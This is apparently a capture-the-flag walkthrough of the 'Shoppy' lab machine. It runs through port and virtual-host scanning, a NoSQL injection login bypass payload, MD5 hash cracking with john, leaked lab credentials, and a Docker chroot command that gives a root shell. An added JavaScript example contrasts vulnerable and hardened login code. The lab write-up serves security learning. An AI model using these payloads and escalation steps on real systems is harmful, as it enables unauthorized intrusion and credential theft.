ip: 10.10.11.180
Information Gathering
Open Ports
Use nmap for port scanning:
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.180
Discovered ports: 22, 80, 9093
Port 80 redirects to http://shoppy.htb
Add an entry for shoppy.htb to the hosts file so the name resolves.
Access http://shoppy.htb/; the homepage is as follows:
Domain Situation
Since there is a domain, let's see what can be found with virtual host scanning.
gobuster vhost -u shoppy.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50
Found a virtual host subdomain: mattermost.shoppy.htb
Add mattermost.shoppy.htb to the hosts file so it resolves.
After accessing it in the browser, the interface is as follows:
Use ffuf to perform sensitive directory and file traversal on shoppy.htb.
.\ffuf.exe -w .\fuzz1.txt -u http://shoppy.htb/FUZZ
A quick test shows that this login box has no POST link.
When entering admin' or '1'='1, the program does not respond. Entering admin' || '1=1 bypasses the backend login. This payload is a NoSQL injection statement, so this is a [[NoSQL injection]] login bypass.
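As an added example (not code from this writeup or from the target application), the following JavaScript contrasts a login handler that splices user input into a MongoDB $where predicate, which is one way the admin' || '1=1 payload above can succeed, with a version that passes the username as plain data and checks its type. The user records are constructed sample data with placeholder secrets, and the $where query structure is an assumption about the backend.

```javascript
// Added illustration, not the Shoppy application's code. Assumption: the login
// handler built a MongoDB $where JavaScript predicate by string concatenation.
// The records below are constructed sample data; the password field stands in
// for a stored hash (a real application compares a password hash, never plaintext).
const users = [
  { username: "admin", password: "PLACEHOLDER_SECRET_ADMIN" },
  { username: "josh", password: "PLACEHOLDER_SECRET_JOSH" },
];

// VULNERABLE: user input is spliced into the predicate source, so a quote and
// an operator in the input (e.g. admin' || '1=1) become part of the query logic:
//   this.username == 'admin' || '1=1' && this.password == 'wrong'
// In JavaScript && binds tighter than ||, so the password check is bypassed
// for any document whose username matches the part before the quote.
function buildWherePredicate(username, password) {
  return `this.username == '${username}' && this.password == '${password}'`;
}

// Emulates $where evaluation: the predicate runs as JavaScript against each
// document with `this` bound to that document. Returns the matched username
// or null when no document satisfies the predicate.
function vulnerableLogin(username, password) {
  const src = buildWherePredicate(username, password);
  const predicate = new Function(`return (${src});`);
  const hit = users.find((doc) => Boolean(predicate.call(doc)));
  return hit ? hit.username : null;
}

// HARDENED: the username is passed as data in a plain object filter, never as
// query syntax, and both fields must be strings. The type check also rejects
// JSON bodies that smuggle operator objects such as {"$ne": ""}, which is a
// second NoSQL injection form not shown in the writeup. The password is then
// verified against the looked-up record instead of inside the query.
function safeLogin(username, password) {
  if (typeof username !== "string" || typeof password !== "string") return null;
  const filter = { username }; // exact-match filter, value is data only
  const hit = users.find((doc) => doc.username === filter.username);
  if (!hit || hit.password !== password) return null;
  return hit.username;
}

// Demonstration with the writeup's payload against the constructed data.
console.log(vulnerableLogin("admin' || '1=1", "wrong")); // "admin": bypassed
console.log(safeLogin("admin' || '1=1", "wrong"));        // null: rejected
```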
Enter the same payload in the search box: admin' || '1=1
View the JSON file; its contents are as follows, including the account and password. The password is stored as an unsalted MD5 hash.
Use [[john]] to crack the hash:
john --wordlist=rockyou.txt --format=Raw-MD5 passwd.txt
remembermethisway
Use the cracked password to log in to mattermost.shoppy.htb
Account password:
josh:remembermethisway
The mattermost.shoppy.htb website is a chat program, and many channels have been created in the backend. An account password was found in one of the channels, which should be the password for the 10.10.11.180 server. Try logging in via SSH.
username: jaeger
password: Sh0ppyBest@pp!
Found the first flag, user.txt.
Running sudo -l shows the programs that the current user can run as root:
/home/deploy/password-manager
The strings contained in the binary are as follows:
Welcome to Josh password manager!
Please enter your master password: 
Sample
Access granted! Here is creds !
cat /home/deploy/creds.txt
Access denied! This incident will be reported !
The string Sample appears immediately before "Access granted!", so Sample is the master password, and running this program with it reveals the stored credentials.
Found the password for deploy.
username: deploy
password: Deploying@pp!
In the same way, log in to the deploy account via SSH.
Privilege Escalation
From the chat records in the channel, it can be seen that the server is deployed using Docker.
Use the Docker privilege escalation payload from https://gtfobins.github.io/gtfobins/docker/. Because the deploy user can run Docker, the host's root filesystem can be mounted into a container and entered with chroot, which gives an interactive shell:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
After running it, the result is a root shell.
Get the flag in the /root directory.
Knowledge Points
- Information gathering skills
- Virtual host, MD5 password cracking skills
- Privilege escalation skills